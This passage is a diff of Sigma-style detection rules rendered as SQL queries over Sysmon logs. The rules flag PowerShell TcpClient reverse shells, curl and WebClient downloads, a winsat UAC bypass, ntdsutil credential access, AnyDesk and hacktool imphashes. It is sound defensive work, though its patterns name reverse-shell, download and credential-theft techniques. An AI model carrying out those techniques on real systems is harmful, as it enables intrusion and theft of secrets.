"edc2f8ae-2412-4dfd-b9d5-0c57727e70be", - "status": "stable", - "description": "Detects usage of the \"TcpClient\" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang \"Invoke-PowerShellTcpOneLine\" reverse shell.", - "author": "FPT.EagleEye, wagga", + "title": "UAC Bypass Abusing Winsat Path Parsing - Process", + "id": "7a01183d-71a2-46ad-ad5c-acd989ac1793", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Administrative might use this function to check network connectivity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '% System.Net.Sockets.TCPClient%' ESCAPE '\\' AND CommandLine LIKE '%.GetBytes%' ESCAPE '\\' AND CommandLine LIKE '%.Write%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel IN ('High', 'System') AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows \\\\system32\\\\winsat.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_reverse_shell_connection.yml" + "filename": "proc_creation_win_uac_bypass_winsat.yml" }, { - "title": "Shell32 DLL Execution in Suspicious Directory", - "id": "32b96012-7892-429e-b26c-ac2bf46066ff", + "title": "Suspicious Mstsc.EXE Execution With Local RDP File", + "id": "6e22722b-dfb1-4508-a911-49ac840b40f8", "status": "experimental", - "description": "Detects shell32.dll executing a DLL in a suspicious directory", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects potential RDP connection via Mstsc using a local \".rdp\" file located in suspicious locations.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218.011" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Likelihood is related to how often the paths are used in the environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%Control\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR OriginalFileName = 'mstsc.exe') AND (CommandLine LIKE '%.rdp' ESCAPE '\\' OR CommandLine LIKE '%.rdp\"' ESCAPE '\\') AND (CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\color%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\System32\\\\Tasks\\_Migrated %' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tracing\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_shell32_susp_execution.yml" + "filename": "proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml" }, { - "title": "Suspicious Hacktool Execution - Imphash", - "id": "24e3e58a-646b-4b50-adef-02ef935b9fc8", + "title": "File Download Via Curl.EXE", + "id": "9a517fca-4ba3-4629-9278-a68694697b81", "status": "experimental", - "description": "Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed", + "description": "Detects file download using curl.exe", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], "falsepositives": [ - "Legitimate use of one of these tools" + "Scripts created by developers and admins", + "Administrative activity", + "The \"\\Git\\usr\\bin\\sh.exe\" process uses the \"--output\" flag to download a specific file in the temp directory with the pattern \"gfw-httpget-xxxxxxxx.txt \"" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b') OR (Hashes LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND (CommandLine LIKE '% -O%' ESCAPE '\\' OR CommandLine LIKE '%--remote-name%' ESCAPE '\\' OR CommandLine LIKE '%--output%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_execution_via_imphashes.yml" + "filename": "proc_creation_win_curl_download.yml" }, { - "title": "Suspicious Rundll32 Script in CommandLine", - "id": "73fcad2e-ff14-4c38-b11d-4172c8ac86c7", - "status": "experimental", - "description": "Detects suspicious process related to rundll32 based on arguments", - "author": "frack113, Zaw Min Htun (ZETA)", + "title": "Remote Access Tool - AnyDesk Execution", + "id": "b52e84a3-029e-4529-b09b-71d19dd27e94", + "status": "test", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32%' ESCAPE '\\' AND (CommandLine LIKE '%mshtml,RunHTMLApplication%' ESCAPE '\\' OR CommandLine LIKE '%mshtml,#135%' ESCAPE '\\') AND (CommandLine LIKE '%javascript:%' ESCAPE '\\' OR CommandLine LIKE '%vbscript:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\AnyDesk.exe' ESCAPE '\\' OR Description = 'AnyDesk' OR Product = 'AnyDesk' OR Company = 'AnyDesk Software GmbH'))" ], - "filename": "proc_creation_win_rundll32_script_run.yml" + "filename": "proc_creation_win_remote_access_tools_anydesk.yml" }, { - "title": "Lolbin Runexehelper Use As Proxy", - "id": "cd71385d-fd9b-4691-9b98-2b1f7e508714", + "title": "Group Membership Reconnaissance Via Whoami.EXE", + "id": "bd8b828d-0dca-48e1-8a63-8a58ecf2644f", "status": "experimental", - "description": "Detect usage of the \"runexehelper.exe\" binary as a proxy to launch other programs", - "author": "frack113", + "description": "Detects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.discovery", + "attack.t1033" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\runexehelper.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% /groups%' ESCAPE '\\' OR CommandLine LIKE '% -groups%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_runexehelper.yml" + "filename": "proc_creation_win_whoami_groups_discovery.yml" }, { - "title": "Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)", - "id": "2afafd61-6aae-4df4-baed-139fa1f4c345", - "status": "test", - "description": "Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)", - "author": "Thomas Patzke", + "title": "Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)", + "id": "a58353df-af43-4753-bad0-cd83ef35eef5", + "status": "experimental", + "description": "Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.credential_access", "attack.t1003.003" ], "falsepositives": [ - "NTDS maintenance" + "Legitimate usage to restore snapshots", + "Legitimate admin activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ntdsutil.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ntdsutil.exe' ESCAPE '\\' OR OriginalFileName = 'ntdsutil.exe') AND ((CommandLine LIKE '%snapshot%' ESCAPE '\\' AND CommandLine LIKE '%mount %' ESCAPE '\\') OR (CommandLine LIKE '%ac%' ESCAPE '\\' AND CommandLine LIKE '% i%' ESCAPE '\\' AND CommandLine LIKE '% ntds%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_ntdsutil_usage.yml" + "filename": "proc_creation_win_ntdsutil_susp_usage.yml" }, { - "title": "Potential Snatch Ransomware Activity", - "id": "5325945e-f1f0-406e-97b8-65104d393fff", - "status": "stable", - "description": "Detects specific process characteristics of Snatch ransomware word document droppers", + "title": "HackTool - SharpChisel Execution", + "id": "cf93e05e-d798-4d9e-b522-b0248dc61eaf", + "status": "experimental", + "description": "Detects usage of the Sharp Chisel via the commandline arguments", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.command_and_control", + "attack.t1090.001" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpChisel.exe' ESCAPE '\\' OR Product = 'SharpChisel'))" + ], + "filename": "proc_creation_win_hktl_sharp_chisel.yml" + }, + { + "title": "PowerShell DownloadFile", + "id": "8f70ac5f-1f6f-4f8e-b454-db19561216c5", + "status": "test", + "description": "Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1204" + "attack.t1059.001", + "attack.command_and_control", + "attack.t1104", + "attack.t1105" ], "falsepositives": [ - "Scripts that shutdown the system immediately and reboot them in safe mode are unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%shutdown /r /f /t 00%' ESCAPE '\\' OR CommandLine LIKE '%net stop SuperBackupMan%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%System.Net.WebClient%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_snatch_ransomware.yml" + "filename": "proc_creation_win_powershell_susp_ps_downloadfile.yml" }, { - "title": "Proxy Execution Via Explorer.exe", - "id": "9eb271b9-24ae-4cd4-9465-19cfc1047f3e", - "status": "test", - "description": "Attackers can use explorer.exe for evading defense mechanisms", - "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative", + "title": "Console CodePage Lookup Via CHCP", + "id": "7090adee-82e2-4269-bd59-80691e7c6338", + "status": "experimental", + "description": "Detects use of chcp to look up the system locale value as part of host discovery", + "author": "_pete_0, TheDFIRReport", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.discovery", + "attack.t1614.001" ], "falsepositives": [ - "Legitimate explorer.exe run from cmd.exe" + "During Anaconda update the 'conda.exe' process will eventually execution the 'chcp' command." ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%explorer.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% /c %' ESCAPE '\\' OR ParentCommandLine LIKE '% /r %' ESCAPE '\\' OR ParentCommandLine LIKE '% /k %' ESCAPE '\\') AND Image LIKE '%\\\\chcp.com' ESCAPE '\\' AND (CommandLine LIKE '%chcp' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\'))" ], - "filename": "proc_creation_win_explorer_lolbin_execution.yml" + "filename": "proc_creation_win_chcp_codepage_lookup.yml" }, { - "title": "UAC Bypass via Event Viewer", - "id": "be344333-921d-4c4d-8bb8-e584cf584780", - "status": "test", - "description": "Detects UAC bypass method using Windows event viewer", - "author": "Florian Roth (Nextron Systems)", + "title": "Node Process Executions", + "id": "df1f26d3-bea7-4700-9ea2-ad3e990cf90e", + "status": "experimental", + "description": "Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud", + "author": "Max Altgelt (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.t1127", + "attack.t1059.007" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\eventvwr.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\mmc.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\SysWOW64\\\\WerFault.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\WerFault.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\Adobe Creative Cloud Experience\\\\libs\\\\node.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%Adobe Creative Cloud Experience\\\\js%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_eventvwr.yml" + "filename": "proc_creation_win_node_adobe_creative_cloud_abuse.yml" }, { - "title": "Audio Capture via SoundRecorder", - "id": "83865853-59aa-449e-9600-74b9d89a6d6e", + "title": "Application Whitelisting Bypass via Dnx.exe", + "id": "81ebd28b-9607-4478-bf06-974ed9d53ed7", "status": "test", - "description": "Detect attacker collecting audio via SoundRecorder application.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", - "tags": [ - "attack.collection", - "attack.t1123" + "description": "Execute C# code located in the consoleapp folder", + "author": "Beyu Denis, oscd.community", + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.t1027.004" ], "falsepositives": [ - "Legitimate audio capture by legitimate user." + "Legitimate use of dnx.exe by legitimate user" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 